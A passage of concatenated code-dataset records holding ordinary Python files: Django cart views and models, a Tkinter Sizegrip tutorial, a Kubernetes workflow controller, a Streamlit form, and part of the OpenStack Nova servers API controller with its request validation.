qty\n\tprofile.save()\n\titem.delete()\n\tmessages.warning(request, 'Item(s) have been removed from your cart')\n\treturn HttpResponseRedirect(reverse('store:cart'))","repo_name":"mthurin/Ninja-Cart","sub_path":"Ninja Cart/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"4287589406","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass IrControl(models.Model):\n name = models.CharField(max_length=100, blank=True, default='')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n # No reverse relation is created, since we set related_name='+'\n owner = models.ForeignKey('auth.User', related_name='+', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = ('name',)\n\n\nclass IrAction(models.Model):\n name = models.CharField(max_length=25)\n decode_type = models.IntegerField(default=0)\n address = models.IntegerField(default=0)\n value = models.FloatField(default=0)\n bits = models.IntegerField(default=0)\n rawlen = models.IntegerField(default=0)\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n control = models.ForeignKey('IrControl', on_delete=models.CASCADE,)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = 
('name',)\n","repo_name":"edunola13/hibris-iot-core-api","sub_path":"apps/ir/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"12361960660","text":"# https://www.pythontutorial.net/tkinter/tkinter-sizegrip/\n\"\"\"\nTkinter Sizegrip\nSummary: in this tutorial, you'll learn how to use the Tkinter Sizegrip widget that allows you to resize the entire\napplication window.\n\nIntroduction to the Tkinter Sizegrip widget\nThe Sizegrip widget is typically located in the bottom right corner of the window. It allows you to resize the entire\napplication window:\nTo create a Sizegrip widget, you use the following syntax:\n ttk.Sizegrip(parent, **option)\n\nTo make sure the Sizegrip widget works properly, you need to make the root window resizable.\nIf you use the grid geometry manager, you need to configure column and row sizes.\n\nTkinter Sizegrip widget example\nThe following program displays a Sizegrip at the bottom right of the root window:\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\n\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.title(\"Sizegrip demo\")\n self.geometry(\"300x200\")\n self.resizable(True, True)\n\n # grid layout\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # create the sizegrip\n sg = ttk.Sizegrip(self)\n sg.grid(row=1, sticky=tk.SE)\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n\"\"\"\nHow it works.\nFirst, make the root window resizable:\n self.resizable(True, True)\n \nSecond, configure the grid layout:\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n \nThird, create a Sizegrip widget:\n sg = ttk.Sizegrip(root)\n sg.grid(row=1, sticky=tk.SE)\n \nSummary\n+ Use the Tkinter Sizegrip widget to allow users to resize the entire application window.\n\"\"\"","repo_name":"julienPalleau/Tkinter","sub_path":"POOTkinter/TkinterSizegrip.py","file_name":"TkinterSizegrip.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"2398983595","text":"# _*_ encoding:utf-8 _*_\n__author__ = 'xyx'\n__date__ = '2017-7-13 23:04'\n\nfrom django.conf.urls import url, include\n\nfrom .views import OrgView\n\nurlpatterns = [\n url(r'list/$',OrgView.as_view(), name='org_list'),\n]","repo_name":"124608760/muxueonline","sub_path":"apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"}{"seq_id":"38998063732","text":"from datetime import datetime\nfrom typing import Dict, List, Tuple, Set, Optional\n\nimport kubernetes\nimport networkx\n\nfrom src.workflow.constants import WorkflowConstants\nfrom src.workflow.status import WorkflowStatusEnum\nfrom src.workflow.workflow import Workflow\nfrom src.workflow.workflow_schema import WorkflowStepSchema, WorkflowSchema\n\n\nclass WorkflowController:\n __WORKFLOW_EXECUTED_STEPS_ANNOTATION__ = \"workflow-executed-steps\"\n __WORKFLOW_STARTED_STEPS_ANNOTATION__ = \"workflow-started-steps\"\n __STEP_SEPARATOR__ = ';'\n __EMPTY_EXECUTED_STEPS_STRING__ = ''\n\n STEP_EXECUTED_SELECTOR = f'metadata.annotations.{__WORKFLOW_EXECUTED_STEPS_ANNOTATION__}'\n\n @staticmethod\n def validate_workflow_spec(workflow_body: Dict) -> Tuple[bool, str]:\n try:\n graph = 
Workflow(WorkflowSchema(steps=WorkflowController.get_workflow_steps(workflow_body)))\n except (RuntimeError, KeyError) as e:\n return False, str(e)\n\n if not networkx.is_directed_acyclic_graph(graph):\n return False, \"Workflow contains a cycle!\"\n return True, \"\"\n\n @staticmethod\n def patch_workflow(patch: Dict, workflow_name: str, namespace: str) -> None:\n kubernetes.client.CustomObjectsApi().patch_namespaced_custom_object(\n body=patch,\n name=workflow_name,\n namespace=namespace,\n group=WorkflowConstants.GROUP,\n version=WorkflowConstants.API_VERSION,\n plural=WorkflowConstants.PLURAL\n )\n\n @staticmethod\n def get_workflow_steps(workflow_body: Dict) -> List[WorkflowStepSchema]:\n return [WorkflowStepSchema(**x) for x in workflow_body['spec']['containers']]\n\n @staticmethod\n def get_executed_steps(workflow_body: Dict) -> List[str]:\n executed_value = workflow_body['metadata']['annotations'][\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__]\n if executed_value == WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__:\n return []\n return executed_value.split(WorkflowController.__STEP_SEPARATOR__)\n\n @staticmethod\n def has_finished(workflow_body: Dict) -> bool:\n return len(WorkflowController.get_workflow_steps(workflow_body)) == len(\n WorkflowController.get_executed_steps(workflow_body))\n\n @staticmethod\n def add_executed_step(workflow_body: Dict, patch: Dict, step_name: str) -> None:\n steps = list(set(WorkflowController.get_executed_steps(workflow_body)).union({step_name}))\n patch.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__] = WorkflowController.__STEP_SEPARATOR__.join(\n steps)\n\n @staticmethod\n def init_executed_steps(workflow_body: Dict) -> None:\n workflow_body.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__] \\\n = WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__\n workflow_body.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__] \\\n = WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__\n\n @staticmethod\n def add_to_started_steps(workflow_body: Dict, patch: Dict, new_started: List[str]) -> None:\n started = set(WorkflowController.__get_already_started_steps(workflow_body)).union(set(new_started))\n patch.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__] = \\\n WorkflowController.__STEP_SEPARATOR__.join(started)\n\n @staticmethod\n def get_steps_to_execute(workflow_body, executed_steps: List[str]) -> Set[WorkflowStepSchema]:\n steps = Workflow(WorkflowSchema(steps=WorkflowController.get_workflow_steps(workflow_body))) \\\n .get_next_to_execute(set(executed_steps))\n already_started = WorkflowController.__get_already_started_steps(workflow_body)\n return set([s for s in steps if s.stepName not in already_started])\n\n @staticmethod\n def update_status(workflow_body: Dict, status: WorkflowStatusEnum, message: Optional[str] = None) -> None:\n workflow_body['status'] = {\n 'workflow-status': str(status),\n 'status-changed': str(datetime.now()),\n 'message': str(message)\n }\n\n @staticmethod\n def get_status(workflow_body: Dict) -> WorkflowStatusEnum:\n return WorkflowStatusEnum.from_string(workflow_body['status']['workflow-status'])\n\n @staticmethod\n def get_status_timestamp(workflow_body: Dict):\n return 
datetime.fromisoformat(workflow_body['status']['status-changed'])\n\n @staticmethod\n def get_max_step_timeout(workflow_body: Dict) -> int:\n return workflow_body['spec']['maxStepTimeout']\n\n @staticmethod\n def __get_already_started_steps(workflow_body: Dict) -> List[str]:\n in_progress = workflow_body['metadata']['annotations'][\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__]\n if in_progress == WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__:\n return []\n return in_progress.split(WorkflowController.__STEP_SEPARATOR__)\n","repo_name":"tc360950/k8_workflow_operator","sub_path":"src/workflow/workflow_controller.py","file_name":"workflow_controller.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"13966128706","text":"import streamlit as st\nimport controllers.material_controllers as material_controllers\nimport models.material as material\n\n# Create the form for the material\ndef criar():\n\n id_alteracao = st.experimental_get_query_params()\n st.experimental_set_query_params()\n material_recuperado = None\n\n if id_alteracao.get(\"id\") != None:\n id_alteracao = id_alteracao.get(\"id\")[0]\n material_recuperado = material_controllers.selecionar_id(id_alteracao)\n # There may be a bug here because of the id\n st.experimental_set_query_params(id=[material_recuperado.id])\n st.title(\"Alterar material\")\n else:\n st.title(\"Incluir\")\n\n st.subheader(\"Incluir Material\")\n with st.form(key = \"Armazenar_material\"):\n if material_recuperado == None:\n input_nome = st.text_input(label=\"Insira seu nome:\")\n input_valor = st.number_input(label=\"Insira o valor:\",format=\"%2f\", step=1.0)\n else:\n input_nome = st.text_input(label=\"Insira seu nome:\",value=material_recuperado.nome)\n input_valor = st.number_input(label=\"Insira o valor:\",format=\"%2f\", step=1.0,value=material_recuperado.valor)\n input_botão_enviar = st.form_submit_button(\"Enviar\")\n\n\n if input_botão_enviar:\n if material_recuperado == None:\n material_controllers.inserir(material.Material(0, input_nome,input_valor))\n st.success(\"Material incluido com sucesso !!\")\n else:\n st.experimental_set_query_params()\n # update the record that was loaded for editing\n material_controllers.alterar(material.Material(material_recuperado.id, input_nome,input_valor))\n st.success(\"Material alterado com sucesso !!\")","repo_name":"Rafadrodrigues/CRUD_Python_MySQL","sub_path":"pages/Material/incluir.py","file_name":"incluir.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"28560040517","text":"import base64\nimport re\nimport sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport oslo_messaging as messaging\nfrom oslo_utils import netutils\nfrom oslo_utils import strutils\nfrom oslo_utils import timeutils\nfrom oslo_utils import uuidutils\nimport six\nimport webob\nfrom webob import exc\n\nfrom nova.api.openstack import common\nfrom nova.api.openstack.compute.views import servers as views_servers\nfrom nova.api.openstack import wsgi\nfrom nova import block_device\nfrom nova import compute\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova.i18n import _\nfrom nova import objects\nfrom nova import policy\nfrom nova import utils\n\n\nserver_opts = [\n cfg.BoolOpt('enable_instance_password',\n default=True,\n help='Enables returning of the instance password by the'\n ' relevant server API calls such as create, 
rebuild'\n ' or rescue, If the hypervisor does not support'\n ' password injection then the password returned will'\n ' not be correct'),\n]\nCONF = cfg.CONF\nCONF.register_opts(server_opts)\nCONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')\n\nLOG = logging.getLogger(__name__)\n\nCREATE_EXCEPTIONS = {\n exception.InvalidMetadataSize: exc.HTTPRequestEntityTooLarge,\n exception.ImageNotFound: exc.HTTPBadRequest,\n exception.FlavorNotFound: exc.HTTPBadRequest,\n exception.KeypairNotFound: exc.HTTPBadRequest,\n exception.ConfigDriveInvalidValue: exc.HTTPBadRequest,\n exception.ImageNotActive: exc.HTTPBadRequest,\n exception.FlavorDiskTooSmall: exc.HTTPBadRequest,\n exception.FlavorMemoryTooSmall: exc.HTTPBadRequest,\n exception.NetworkNotFound: exc.HTTPBadRequest,\n exception.PortNotFound: exc.HTTPBadRequest,\n exception.FixedIpAlreadyInUse: exc.HTTPBadRequest,\n exception.SecurityGroupNotFound: exc.HTTPBadRequest,\n exception.InstanceUserDataTooLarge: exc.HTTPBadRequest,\n exception.InstanceUserDataMalformed: exc.HTTPBadRequest,\n exception.ImageNUMATopologyIncomplete: exc.HTTPBadRequest,\n exception.ImageNUMATopologyForbidden: exc.HTTPBadRequest,\n exception.ImageNUMATopologyAsymmetric: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUOutOfRange: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUDuplicates: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUsUnassigned: exc.HTTPBadRequest,\n exception.ImageNUMATopologyMemoryOutOfRange: exc.HTTPBadRequest,\n exception.PortInUse: exc.HTTPConflict,\n exception.InstanceExists: exc.HTTPConflict,\n exception.NoUniqueMatch: exc.HTTPConflict,\n exception.Invalid: exc.HTTPBadRequest,\n exception.InstanceGroupNotFound: exc.HTTPBadRequest,\n}\n\nCREATE_EXCEPTIONS_MSGS = {\n exception.ImageNotFound: _(\"Can not find requested image\"),\n exception.FlavorNotFound: _(\"Invalid flavorRef provided.\"),\n exception.KeypairNotFound: _(\"Invalid key_name provided.\"),\n exception.ConfigDriveInvalidValue: _(\"Invalid config_drive provided.\"),\n}\n\n\nclass Controller(wsgi.Controller):\n \"\"\"The Server API base controller class for the OpenStack API.\"\"\"\n\n _view_builder_class = views_servers.ViewBuilder\n\n @staticmethod\n def _add_location(robj):\n # Just in case...\n if 'server' not in robj.obj:\n return robj\n\n link = [l for l in robj.obj['server']['links'] if l['rel'] == 'self']\n if link:\n robj['Location'] = utils.utf8(link[0]['href'])\n\n # Convenience return\n return robj\n\n def __init__(self, ext_mgr=None, **kwargs):\n super(Controller, self).__init__(**kwargs)\n self.compute_api = compute.API()\n self.ext_mgr = ext_mgr\n\n def index(self, req):\n \"\"\"Returns a list of server names and ids for a given user.\"\"\"\n try:\n servers = self._get_servers(req, is_detail=False)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n return servers\n\n def detail(self, req):\n \"\"\"Returns a list of server details for a given user.\"\"\"\n try:\n servers = self._get_servers(req, is_detail=True)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n return servers\n\n def _get_servers(self, req, is_detail):\n \"\"\"Returns a list of servers, based on any search options specified.\"\"\"\n\n search_opts = {}\n search_opts.update(req.GET)\n\n context = req.environ['nova.context']\n remove_invalid_options(context, search_opts,\n self._get_server_search_options())\n\n # Verify search by 'status' contains a valid status.\n # Convert it to filter 
by vm_state or task_state for compute_api.\n search_opts.pop('status', None)\n if 'status' in req.GET.keys():\n statuses = req.GET.getall('status')\n states = common.task_and_vm_state_from_status(statuses)\n vm_state, task_state = states\n if not vm_state and not task_state:\n return {'servers': []}\n search_opts['vm_state'] = vm_state\n # When we search by vm state, task state will return 'default'.\n # So we don't need task_state search_opt.\n if 'default' not in task_state:\n search_opts['task_state'] = task_state\n\n if 'changes-since' in search_opts:\n try:\n parsed = timeutils.parse_isotime(search_opts['changes-since'])\n except ValueError:\n msg = _('Invalid changes-since value')\n raise exc.HTTPBadRequest(explanation=msg)\n search_opts['changes-since'] = parsed\n\n # By default, compute's get_all() will return deleted instances.\n # If an admin hasn't specified a 'deleted' search option, we need\n # to filter out deleted instances by setting the filter ourselves.\n # ... Unless 'changes-since' is specified, because 'changes-since'\n # should return recently deleted images according to the API spec.\n\n if 'deleted' not in search_opts:\n if 'changes-since' not in search_opts:\n # No 'changes-since', so we only want non-deleted servers\n search_opts['deleted'] = False\n else:\n # Convert deleted filter value to a valid boolean.\n # Return non-deleted servers if an invalid value\n # is passed with deleted filter.\n search_opts['deleted'] = strutils.bool_from_string(\n search_opts['deleted'], default=False)\n\n if search_opts.get(\"vm_state\") == ['deleted']:\n if context.is_admin:\n search_opts['deleted'] = True\n else:\n msg = _(\"Only administrators may list deleted instances\")\n raise exc.HTTPForbidden(explanation=msg)\n\n all_tenants = common.is_all_tenants(search_opts)\n # use the boolean from here on out so remove the entry from search_opts\n # if it's present\n search_opts.pop('all_tenants', None)\n\n elevated = None\n if all_tenants:\n policy.enforce(context, 'compute:get_all_tenants',\n {'project_id': context.project_id,\n 'user_id': context.user_id})\n elevated = context.elevated()\n else:\n if context.project_id:\n search_opts['project_id'] = context.project_id\n else:\n search_opts['user_id'] = context.user_id\n\n limit, marker = common.get_limit_and_marker(req)\n # Sorting by multiple keys and directions is conditionally enabled\n sort_keys, sort_dirs = None, None\n if self.ext_mgr.is_loaded('os-server-sort-keys'):\n sort_keys, sort_dirs = common.get_sort_params(req.params)\n\n expected_attrs = None\n if is_detail:\n # merge our expected attrs with what the view builder needs for\n # showing details\n expected_attrs = self._view_builder.get_show_expected_attrs(\n expected_attrs)\n\n try:\n instance_list = self.compute_api.get_all(elevated or context,\n search_opts=search_opts, limit=limit, marker=marker,\n want_objects=True, expected_attrs=expected_attrs,\n sort_keys=sort_keys, sort_dirs=sort_dirs)\n except exception.MarkerNotFound:\n msg = _('marker [%s] not found') % marker\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.FlavorNotFound:\n LOG.debug(\"Flavor '%s' could not be found\", search_opts['flavor'])\n instance_list = objects.InstanceList()\n\n if is_detail:\n instance_list._context = context\n instance_list.fill_faults()\n response = self._view_builder.detail(req, instance_list)\n else:\n response = self._view_builder.index(req, instance_list)\n req.cache_db_instances(instance_list)\n return response\n\n def _get_server(self, context, req, 
instance_uuid, is_detail=False):\n \"\"\"Utility function for looking up an instance by uuid.\n\n :param context: request context for auth\n :param req: HTTP request. The instance is cached in this request.\n :param instance_uuid: UUID of the server instance to get\n :param is_detail: True if you plan on showing the details of the\n instance in the response, False otherwise.\n \"\"\"\n expected_attrs = ['flavor']\n if is_detail:\n expected_attrs = self._view_builder.get_show_expected_attrs(\n expected_attrs)\n instance = common.get_instance(self.compute_api, context,\n instance_uuid,\n expected_attrs=expected_attrs)\n req.cache_db_instance(instance)\n return instance\n\n def _check_string_length(self, value, name, max_length=None):\n try:\n if isinstance(value, six.string_types):\n value = value.strip()\n utils.check_string_length(value, name, min_length=1,\n max_length=max_length)\n except exception.InvalidInput as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n def _validate_server_name(self, value):\n self._check_string_length(value, 'Server name', max_length=255)\n\n def _get_injected_files(self, personality):\n \"\"\"Create a list of injected files from the personality attribute.\n\n At this time, injected_files must be formatted as a list of\n (file_path, file_content) pairs for compatibility with the\n underlying compute service.\n \"\"\"\n injected_files = []\n\n for item in personality:\n try:\n path = item['path']\n contents = item['contents']\n except KeyError as key:\n expl = _('Bad personality format: missing %s') % key\n raise exc.HTTPBadRequest(explanation=expl)\n except TypeError:\n expl = _('Bad personality format')\n raise exc.HTTPBadRequest(explanation=expl)\n if self._decode_base64(contents) is None:\n expl = _('Personality content for %s cannot be decoded') % path\n raise exc.HTTPBadRequest(explanation=expl)\n injected_files.append((path, contents))\n return injected_files\n\n def _get_requested_networks(self, requested_networks):\n \"\"\"Create a list of requested networks from the networks attribute.\"\"\"\n networks = []\n network_uuids = []\n for network in requested_networks:\n request = objects.NetworkRequest()\n try:\n try:\n request.port_id = network.get('port', None)\n except ValueError:\n msg = _(\"Bad port format: port uuid is \"\n \"not in proper format \"\n \"(%s)\") % network.get('port')\n raise exc.HTTPBadRequest(explanation=msg)\n if request.port_id:\n request.network_id = None\n if not utils.is_neutron():\n # port parameter is only for neutron v2.0\n msg = _(\"Unknown argument : port\")\n raise exc.HTTPBadRequest(explanation=msg)\n else:\n request.network_id = network['uuid']\n\n if (not request.port_id and not\n uuidutils.is_uuid_like(request.network_id)):\n br_uuid = request.network_id.split('-', 1)[-1]\n if not uuidutils.is_uuid_like(br_uuid):\n msg = _(\"Bad networks format: network uuid is \"\n \"not in proper format \"\n \"(%s)\") % request.network_id\n raise exc.HTTPBadRequest(explanation=msg)\n\n # fixed IP address is optional\n # if the fixed IP address is not provided then\n # it will use one of the available IP address from the network\n try:\n request.address = network.get('fixed_ip', None)\n except ValueError:\n msg = (_(\"Invalid fixed IP address (%s)\") %\n network.get('fixed_ip'))\n raise exc.HTTPBadRequest(explanation=msg)\n\n # duplicate networks are allowed only for neutron v2.0\n if (not utils.is_neutron() and request.network_id and\n request.network_id in network_uuids):\n expl = (_(\"Duplicate networks\"\n \" 
(%s) are not allowed\") %\n request.network_id)\n raise exc.HTTPBadRequest(explanation=expl)\n network_uuids.append(request.network_id)\n networks.append(request)\n except KeyError as key:\n expl = _('Bad network format: missing %s') % key\n raise exc.HTTPBadRequest(explanation=expl)\n except TypeError:\n expl = _('Bad networks format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n return objects.NetworkRequestList(objects=networks)\n\n # NOTE(vish): Without this regex, b64decode will happily\n # ignore illegal bytes in the base64 encoded\n # data.\n B64_REGEX = re.compile('^(?:[A-Za-z0-9+\\/]{4})*'\n '(?:[A-Za-z0-9+\\/]{2}=='\n '|[A-Za-z0-9+\\/]{3}=)?$')\n\n def _decode_base64(self, data):\n if isinstance(data, six.binary_type) and hasattr(data, \"decode\"):\n try:\n data = data.decode(\"utf-8\")\n except UnicodeDecodeError:\n return None\n data = re.sub(r'\\s', '', data)\n if not self.B64_REGEX.match(data):\n return None\n try:\n return base64.b64decode(data)\n except TypeError:\n return None\n\n def _validate_access_ipv4(self, address):\n if not netutils.is_valid_ipv4(address):\n expl = _('accessIPv4 is not proper IPv4 format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n def _validate_access_ipv6(self, address):\n if not netutils.is_valid_ipv6(address):\n expl = _('accessIPv6 is not proper IPv6 format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n def show(self, req, id):\n \"\"\"Returns server details by server id.\"\"\"\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id, is_detail=True)\n return self._view_builder.show(req, instance)\n\n def _extract(self, server_dict, ext_name, key):\n if self.ext_mgr.is_loaded(ext_name):\n return server_dict.get(key)\n return None\n\n def _validate_user_data(self, user_data):\n if user_data and self._decode_base64(user_data) is None:\n expl = _('Userdata content cannot be decoded')\n raise exc.HTTPBadRequest(explanation=expl)\n return user_data\n\n def _extract_bdm(self, server_dict, image_uuid_specified):\n legacy_bdm = True\n block_device_mapping_v2 = None\n if not self.ext_mgr.is_loaded('os-volumes'):\n return legacy_bdm, None\n block_device_mapping = server_dict.get('block_device_mapping', [])\n if not isinstance(block_device_mapping, list):\n msg = _('block_device_mapping must be a list')\n raise exc.HTTPBadRequest(explanation=msg)\n for bdm in block_device_mapping:\n try:\n block_device.validate_device_name(bdm.get(\"device_name\"))\n block_device.validate_and_default_volume_size(bdm)\n except exception.InvalidBDMFormat as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n if 'delete_on_termination' in bdm:\n bdm['delete_on_termination'] = strutils.bool_from_string(\n bdm['delete_on_termination'])\n\n if self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot'):\n # Consider the new data format for block device mapping\n block_device_mapping_v2 = server_dict.get(\n 'block_device_mapping_v2', [])\n # NOTE (ndipanov): Disable usage of both legacy and new\n # block device format in the same request\n if block_device_mapping and block_device_mapping_v2:\n expl = _('Using different block_device_mapping syntaxes '\n 'is not allowed in the same request.')\n raise exc.HTTPBadRequest(explanation=expl)\n\n if not isinstance(block_device_mapping_v2, list):\n msg = _('block_device_mapping_v2 must be a list')\n raise exc.HTTPBadRequest(explanation=msg)\n\n # Assume legacy format\n legacy_bdm = not bool(block_device_mapping_v2)\n\n try:\n block_device_mapping_v2 = [\n 
block_device.BlockDeviceDict.from_api(bdm_dict,\n image_uuid_specified)\n for bdm_dict in block_device_mapping_v2]\n except exception.InvalidBDMFormat as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n bdm = (block_device_mapping or block_device_mapping_v2)\n return legacy_bdm, bdm\n\n @staticmethod\n def _resolve_exception(matches):\n \"\"\"We want the most specific exception class.\"\"\"\n while len(matches) > 1:\n first = matches[0]\n second = matches[1]\n if issubclass(first, second):\n del matches[1]\n else:\n del matches[0]\n return matches[0]\n\n @staticmethod\n def _handle_create_exception(*exc_info):\n \"\"\"The `CREATE_EXCEPTIONS` dict containing the relationships between\n the nova exceptions and the webob exception classes to be raised is\n defined at the top of this file.\n \"\"\"\n error = exc_info[1]\n err_cls = error.__class__\n cls_to_raise = CREATE_EXCEPTIONS.get(err_cls)\n if cls_to_raise is None:\n # The error is a subclass of one of the dict keys\n to_raise = [val for key, val in CREATE_EXCEPTIONS.items()\n if isinstance(error, key)]\n if len(to_raise) > 1:\n cls_to_raise = Controller._resolve_exception(to_raise)\n elif not to_raise:\n # Not any of the expected exceptions, so re-raise\n six.reraise(*exc_info)\n else:\n cls_to_raise = to_raise[0]\n\n for key, val in CREATE_EXCEPTIONS_MSGS.items():\n if isinstance(error, key):\n raise cls_to_raise(explanation=CREATE_EXCEPTIONS_MSGS[key])\n raise cls_to_raise(explanation=error.format_message())\n\n def _determine_requested_networks(self, server_dict):\n requested_networks = None\n if (self.ext_mgr.is_loaded('os-networks')\n or utils.is_neutron()):\n requested_networks = server_dict.get('networks')\n\n if requested_networks is not None:\n if not isinstance(requested_networks, list):\n expl = _('Bad networks format')\n raise exc.HTTPBadRequest(explanation=expl)\n requested_networks = self._get_requested_networks(\n requested_networks)\n return requested_networks\n\n @wsgi.response(202)\n def create(self, req, body):\n \"\"\"Creates a new server for a given user.\"\"\"\n if not self.is_valid_body(body, 'server'):\n raise exc.HTTPUnprocessableEntity()\n\n context = req.environ['nova.context']\n server_dict = body['server']\n password = self._get_server_admin_password(server_dict)\n\n if 'name' not in server_dict:\n msg = _(\"Server name is not defined\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n name = server_dict['name']\n self._validate_server_name(name)\n name = name.strip()\n\n image_uuid = self._image_from_req_data(body)\n\n personality = server_dict.get('personality')\n config_drive = None\n if self.ext_mgr.is_loaded('os-config-drive'):\n config_drive = server_dict.get('config_drive')\n\n injected_files = []\n if personality:\n injected_files = self._get_injected_files(personality)\n\n sg_names = []\n if self.ext_mgr.is_loaded('os-security-groups'):\n security_groups = server_dict.get('security_groups')\n if security_groups is not None:\n try:\n sg_names = [sg['name'] for sg in security_groups\n if sg.get('name')]\n except AttributeError:\n msg = _(\"Invalid input for field/attribute %(path)s.\"\n \" Value: %(value)s. 
%(message)s\") % {\n 'path': 'security_groups',\n 'value': security_groups,\n 'message': ''\n }\n raise exc.HTTPBadRequest(explanation=msg)\n if not sg_names:\n sg_names.append('default')\n\n sg_names = list(set(sg_names))\n\n requested_networks = self._determine_requested_networks(server_dict)\n\n (access_ip_v4, ) = server_dict.get('accessIPv4'),\n if access_ip_v4 is not None:\n self._validate_access_ipv4(access_ip_v4)\n\n (access_ip_v6, ) = server_dict.get('accessIPv6'),\n if access_ip_v6 is not None:\n self._validate_access_ipv6(access_ip_v6)\n\n flavor_id = self._flavor_id_from_req_data(body)\n\n # optional openstack extensions:\n key_name = self._extract(server_dict, 'os-keypairs', 'key_name')\n availability_zone = self._extract(server_dict, 'os-availability-zone',\n 'availability_zone')\n user_data = self._extract(server_dict, 'os-user-data', 'user_data')\n self._validate_user_data(user_data)\n\n image_uuid_specified = bool(image_uuid)\n legacy_bdm, block_device_mapping = self._extract_bdm(server_dict,\n image_uuid_specified)\n\n ret_resv_id = False\n # min_count and max_count are optional. If they exist, they may come\n # in as strings. Verify that they are valid integers and > 0.\n # Also, we want to default 'min_count' to 1, and default\n # 'max_count' to be 'min_count'.\n min_count = 1\n max_count = 1\n if self.ext_mgr.is_loaded('os-multiple-create'):\n ret_resv_id = server_dict.get('return_reservation_id', False)\n min_count = server_dict.get('min_count', 1)\n max_count = server_dict.get('max_count', min_count)\n\n try:\n min_count = utils.validate_integer(\n min_count, \"min_count\", min_value=1)\n max_count = utils.validate_integer(\n max_count, \"max_count\", min_value=1)\n except exception.InvalidInput as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n if min_count > max_count:\n msg = _('min_count must be <= max_count')\n raise exc.HTTPBadRequest(explanation=msg)\n\n auto_disk_config = False\n if self.ext_mgr.is_loaded('OS-DCF'):\n auto_disk_config = server_dict.get('auto_disk_config')\n\n scheduler_hints = {}\n if self.ext_mgr.is_loaded('OS-SCH-HNT'):\n scheduler_hints = server_dict.get('scheduler_hints', {})\n parse_az = self.compute_api.parse_availability_zone\n availability_zone, host, node = parse_az(context, availability_zone)\n\n check_server_group_quota = self.ext_mgr.is_loaded(\n 'os-server-group-quotas')\n try:\n _get_inst_type = flavors.get_flavor_by_flavor_id\n inst_type = _get_inst_type(flavor_id, ctxt=context,\n read_deleted=\"no\")\n\n (instances, resv_id) = self.compute_api.create(context,\n inst_type,\n image_uuid,\n display_name=name,\n display_description=name,\n key_name=key_name,\n metadata=server_dict.get('metadata', {}),\n access_ip_v4=access_ip_v4,\n access_ip_v6=access_ip_v6,\n injected_files=injected_files,\n admin_password=password,\n min_count=min_count,\n max_count=max_count,\n requested_networks=requested_networks,\n security_group=sg_names,\n user_data=user_data,\n availability_zone=availability_zone,\n forced_host=host, forced_node=node,\n config_drive=config_drive,\n block_device_mapping=block_device_mapping,\n auto_disk_config=auto_disk_config,\n scheduler_hints=scheduler_hints,\n legacy_bdm=legacy_bdm,\n check_server_group_quota=check_server_group_quota)\n except (exception.QuotaError,\n exception.PortLimitExceeded) as error:\n raise exc.HTTPForbidden(\n explanation=error.format_message())\n except messaging.RemoteError as err:\n msg = \"%(err_type)s: %(err_msg)s\" % {'err_type': err.exc_type,\n 'err_msg': err.value}\n 
